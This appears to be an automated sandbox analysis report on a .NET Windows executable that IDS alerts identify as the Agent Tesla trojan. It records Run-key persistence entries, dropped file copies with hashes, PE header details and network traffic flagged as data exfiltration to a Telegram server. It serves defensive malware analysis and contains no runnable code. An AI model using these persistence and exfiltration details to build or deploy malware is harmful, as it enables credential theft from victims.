                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                               • Not all processes were analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                               Time | Type | Description
                                               19:37:51 | API Interceptor | 102x Sleep call for process: powershell.exe modified
                                               19:38:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                               19:38:23 | API Interceptor | 752x Sleep call for process: file.exe modified
                                               19:38:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                               19:38:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                               19:38:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                               19:39:35 | API Interceptor | 18x Sleep call for process: Qasvjoldkyh.exe modified
                                               19:39:48 | API Interceptor | 116x Sleep call for process: kDPmkTm.exe modified
                                              No context
                                              Process:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1459
                                              Entropy (8bit):5.3420905847574325
                                              Encrypted:false
                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                              MD5:FB4B7720101F874710FF986326F7980F
                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1459
                                              Entropy (8bit):5.3420905847574325
                                              Encrypted:false
                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                              MD5:FB4B7720101F874710FF986326F7980F
                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
                                              Process:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1459
                                              Entropy (8bit):5.3420905847574325
                                              Encrypted:false
                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                              MD5:FB4B7720101F874710FF986326F7980F
                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5829
                                              Entropy (8bit):4.902247628650607
                                              Encrypted:false
                                              SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                              MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                              SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                              SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                              SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                              Malicious:false
                                              Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):15596
                                              Entropy (8bit):5.5531622815475545
                                              Encrypted:false
                                              SSDEEP:384:Fte/bq0uRu2AH68SBxnuilrIaBsFv917NnlZ:VA/4xuilrwxplZ
                                              MD5:9EF84D725C2607A4AED65AD3158C3AB1
                                              SHA1:9BAB855CB21B192916AD2E728A2A7447ED986BA2
                                              SHA-256:5F70DC72B68DB5E131213081C0B253710ABD4F42EBA9BB0449E4ADED30F3070F
                                              SHA-512:7799E2FA990922355A2DC76BECA969FFCA860060C2CFAFF89A9F9A6E935ACE4747351181570411422BB3AA9B3F83507E8F9E6764090EF7F2EF4918F07E4A1189
                                              Malicious:false
                                              Preview:@...e...........$.......$...N.A.A.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1825280
                                              Entropy (8bit):5.291589770491668
                                              Encrypted:false
                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                              MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
                                              SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
                                              SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
• Antivirus: Virustotal, Detection: 44%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1825280
                                              Entropy (8bit):5.291589770491668
                                              Encrypted:false
                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                              MD5:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              SHA1:CB40F86B808C7B7812FFF7820DC596D3A78E5760
                                              SHA-256:BB4297E1D60FBF0C9670F3A436D3C00993307CCF5BBF9BADE4A6EBCB608EDD6C
                                              SHA-512:12FE7E8088D62A32F53BA9DB9E425D41F8C95DEA742AF3E7BEECC8CAE50E97E9573EBFA839EC339D57804B32C2A864110F9135BCDE8123C2B5D10A1E3B4C7C38
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 36%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`.....................................J.......0.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc....... ......................@..B........................H.......09..t.......4....U.............................................N.(.....-.+.(-...+.*^+..-.&+......+.*s....+..0..M.......+#,.+&+'+(.-.&+.+'+.*+)+*.-.&&+.+$+.*(....+..+..+.s1...+.(....+..+..+.(....+.....0..T.......++,.+.+/+0+1.-.&+.+0+.*+2+3+4.-.&&&+.(....+.*(....+..+..+..+.s@...+.(....+..+..+..+..0..G.......+#,..-..-.+ +!.-.&+.+ +.*.,.+.+ &.,.*(....+..+.s5...+.(....+..+.(....+...0..H.......+$,.+'+(.-.&.,..-.+.+!+.*+#.-.&+.+.+.*(....+..+.sV...+.(....+..+.(....+..0..O...
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.291589770491668
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:file.exe
                                              File size:1825280
                                              MD5:2ddec3a033a6ded2ec135bb2f3ec897d
                                              SHA1:cb40f86b808c7b7812fff7820dc596d3a78e5760
                                              SHA256:bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
                                              SHA512:12fe7e8088d62a32f53ba9db9e425d41f8c95dea742af3e7beecc8cae50e97e9573ebfa839ec339d57804b32c2a864110f9135bcde8123c2b5d10a1e3b4c7c38
                                              SSDEEP:24576:rWWKtu1Dze6HDpLaCKyUjOK/sQg1GuYfyQ6vOHRQPrMgYJvlaWW33Q4Sfp8gkAmh:6JJjdagPM3v90Q6pYX
                                              TLSH:5D855BF20283FEC5A76F1D4484143940AC1418676BBC9768FDC92A97A3E9524EF9DEF0
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d................................. ........@.. .......................@............`................................
                                              Icon Hash:00828e8e8686b000
                                              Entrypoint:0x5beeda
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6418981C [Mon Mar 20 17:30:04 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(the remaining entry-point bytes are zeros, which disassemble as "add byte ptr [eax], al" repeated 97 times)

The only real instruction is the jump: 0x00402000 is Imagebase 0x400000 plus the IAT RVA 0x2000 (see IMAGE_DIRECTORY_ENTRY_IAT below), whose single entry is the mscoree.dll import _CorExeMain. This is the standard native stub of a 32-bit .NET executable, so the disassembly reveals nothing about the sample's behaviour; the managed code in .text is what matters.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1bee90         0x4a          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1c0000         0x530         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1c2000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x1bcee0      0x1bd000  False     0.4746565572331461  data       5.286588181165908    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x1c0000         0x530         0x600     False     0.3938802083333333  data       3.806174196677056    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x1c2000         0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                                                        Language  Country
RT_VERSION   0x1c005c  0x2e4  data
RT_MANIFEST  0x1c037c  0x1b4  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
03/20/23-19:39:50.282462  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49702        443        192.168.2.4  149.154.167.220
03/20/23-19:38:26.620974  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49698        443        192.168.2.4  149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Mar 20, 2023 19:38:19.603668928 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:19.603749990 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:19.603835106 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:19.630438089 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:19.630492926 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.328294039 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.328383923 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.340078115 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.340123892 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.340564966 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.380551100 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.649841070 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.649912119 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.818044901 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.818145990 CET  443          49697      104.237.62.211   192.168.2.4
Mar 20, 2023 19:38:20.818200111 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:20.819470882 CET  49697        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:38:26.500169039 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.500233889 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.500312090 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.501146078 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.501173973 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.574767113 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.574979067 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.578350067 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.578412056 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.578983068 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.581166029 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.581233978 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.618748903 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:26.620809078 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:26.620852947 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:27.011068106 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:27.011209965 CET  443          49698      149.154.167.220  192.168.2.4
Mar 20, 2023 19:38:27.011363983 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:38:27.027559042 CET  49698        443        192.168.2.4      149.154.167.220
Mar 20, 2023 19:39:25.531714916 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:25.531794071 CET  443          49700      104.237.62.211   192.168.2.4
Mar 20, 2023 19:39:25.531898022 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:25.550930023 CET  49700        443        192.168.2.4      104.237.62.211
Mar 20, 2023 19:39:25.550990105 CET  443          49700      104.237.62.211   192.168.2.4
